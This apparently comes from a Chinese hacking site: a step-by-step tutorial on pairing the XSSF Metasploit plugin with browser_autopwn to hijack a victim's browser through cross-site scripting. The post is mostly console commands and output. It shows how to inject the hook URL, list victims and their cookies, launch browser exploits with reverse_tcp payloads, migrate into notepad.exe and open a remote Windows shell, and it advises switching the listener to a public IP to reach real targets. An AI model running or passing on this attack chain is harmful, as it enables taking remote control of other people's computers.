author:RootkitHat.Org
有装B的嫌疑,但是你如何得知你的目标用什么系统和什么浏览器
相似的工具这里有一个:http://xss-proxy.sourceforge.net
附件: Parh /sploits/2011/06/XSSF.zip
解压后吧附件全部复制到 /msf3/里面
启动metasploit ,创建数据库,并且载入插件
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 335 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11089 updated 239 days ago (2010.11.22)
Warning: This copy of the Metasploit Framework was last updated 239 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > db_disconnect
msf > db_driver mysql
msf > db_connect root:toor@127.0.0.1/xssftest
msf > load xssf
__ __ ______ ______ ______
/\_\_\_\ /\ ___\ /\ ___\ /\ ___\
\/_/\_\/_ \ \___ \ \ \___ \ \ \ __\
/\_\/\_\ \/\_____\ \/\_____\ \ \_\
\/_/\/_/ \/_____/ \/_____/ \/_/ Cross-Site Scripting Framework
Ludovic Courgnaud - CONIX Security
[+] Server started : http://192.168.56.101:8888/
[*] Please, inject 'http://192.168.56.101:8888/loop' resource in an XSS
[*] Successfully loaded plugin: XSSF
如果IP不是你外网IP请修改/opt/metasploit3/msf3/plugins/xssf.rb 吧0,0,0,0换成你的外网IP
然后让目标机xss “http://192.168.56.101:8888/loop”
查看xss会话
msf > xssf_victims
Victims
=======
id xssf_server_id active ip interval browser_name browser_version cookie
-- -------------- ------ -- -------- ------------ --------------- ------
1 1 true 192.168.56.1 2 Internet Explorer 6.0 YES
[*] Use xssf_information [VictimID] to see more information about a victim
true 代表可以使用
链接xss会话
msf > xssf_information 1
INFORMATION ABOUT VICTIM 1
============================
IP ADDRESS : 192.168.56.1
ACTIVE : TRUE
FIRST REQUEST : Tue Jul 19 23:30:25 UTC 2011
LAST REQUEST : Tue Jul 19 23:31:17 UTC 2011
CONNECTION TIME : 52.0 seconds
BROWSER NAME : Internet Explorer
BROWSER VERSION : 6.0
OS NAME : Windows
OS VERSION : XP
ARCHITECTURE : ARCH_X86
LOCATION : file:///C:/Documents and Settings/dis9team/妗棰/xss.htm
COOKIES ? : YES
RUNNING ATTACK : NONE
如何取得系统权限:
使用METASPLOIT模块自动创建一些浏览器漏洞 注意端口不能和xssf插件端口相同
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVPORT 8081
SRVPORT => 8081
msf auxiliary(browser_autopwn) > exploit
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] Starting exploit modules on host 192.168.56.101...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/QlQp2UFx8EADO
[*] Server started.
msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/pqDNRyLmHuA
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/kXVd9wNJ7
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/zNNqGn8p
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nZqqJnbK17P2Uu
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/l45IFo
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/4uYjQ9Cd
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/jUnB2WdlVh
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/w3xxrTDcW1D
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nf21OPGpG4
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/C7HBuD
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/GpI7DbKJ2wp5kS
[*] Server started.
[*] Starting exploit windows/browser/java_basicservice_impl with payload windows/meterpreter/reverse_tcp
[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[-] Failed to start exploit module windows/browser/java_basicservice_impl
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/xFm6pSwb
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/yVJcsYOtv
[*] Server started.
[*] Starting exploit windows/browser/ms10_xxx_ie_css_clip with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/JaT9yvjsEik
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/1t4f8o9
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.56.101:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.56.101:6666
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.56.101:7777
[*] Starting the payload handler...
[*] --- Done, found 16 exploit modules
[*] Using URL: http://192.168.56.101:8081/Xy5LvGuPst
[*] Server started.
查看可以利用的漏洞
msf auxiliary(browser_autopwn) > jobs
Jobs
====
Id Name
-- ----
0 Auxiliary: server/browser_autopwn
1 Exploit: multi/browser/firefox_escape_retval
2 Exploit: multi/browser/java_calendar_deserialize
3 Exploit: multi/browser/java_trusted_chain
4 Exploit: multi/browser/mozilla_compareto
5 Exploit: multi/browser/mozilla_navigatorjava
6 Exploit: multi/browser/opera_configoverwrite
7 Exploit: multi/browser/opera_historysearch
8 Exploit: osx/browser/safari_metadata_archive
9 Exploit: windows/browser/apple_quicktime_marshaled_punk
10 Exploit: windows/browser/apple_quicktime_rtsp
11 Exploit: windows/browser/apple_quicktime_smil_debug
12 Exploit: windows/browser/ie_createobject
13 Exploit: windows/browser/ms03_020_ie_objecttype
14 Exploit: windows/browser/ms10_018_ie_behaviors
15 Exploit: windows/browser/ms10_xxx_ie_css_clip
16 Exploit: windows/browser/winzip_fileview
17 Exploit: multi/handler
18 Exploit: multi/handler
19 Exploit: multi/handler
根据你目标的操作系统选择利用模块
xssf_exploit 1 12 第一个数字是xss会话 第二个数字是浏览器漏洞编号
msf auxiliary(browser_autopwn) > xssf_exploit 1 12
[*] Searching Metasploit launched module with JobID = '12'...
[+] A running exploit exists : 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:44018...
[+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '4'
[+] Remaining victims to attack : NONE
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:51709...
[*] Sending EXE payload to 192.168.56.101:60903...
[*] Sending stage (749056 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.101:3333 -> 192.168.56.1:37151) at Tue Jul 19 23:42:03 -0400 2011
[*] Session ID 1 (192.168.56.101:3333 -> 192.168.56.1:37151) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: njoFrATVcA.exe (1728)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1092
[*] New server process: notepad.exe (1092)
^C[-] Exploit interrupted by the console user
msf auxiliary(browser_autopwn) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 DIS9TEAM-7A9CFB\dis9team @ DIS9TEAM-7A9CFB 192.168.56.101:3333 -> 192.168.56.1:37151
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 5504 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\Documents and Settings\dis9team\桌面>
完毕
|
推荐
评论(0条)
